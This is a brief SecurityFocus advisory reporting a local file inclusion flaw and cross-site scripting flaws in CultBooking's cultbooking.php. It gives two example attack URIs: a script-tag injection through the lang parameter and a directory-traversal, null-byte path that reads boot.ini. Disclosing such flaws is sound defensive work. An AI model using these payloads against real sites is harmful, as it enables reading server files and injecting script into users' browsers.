CultBooking 'cultbooking.php' Local File Include and Multiple Cross Site Scripting Vulnerabilities

Attackers can exploit these issues using a browser. To exploit a cross-site scripting issue, attackers must entice an unsuspecting user to follow a malicious URI.

The following example URIs are available:

http://www.example.com/cultbooking.php?lang=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E

http://www.example.com/cultbooking.php?lang=../../../boot.ini%00


 

Privacy Statement
Copyright 2010, SecurityFocus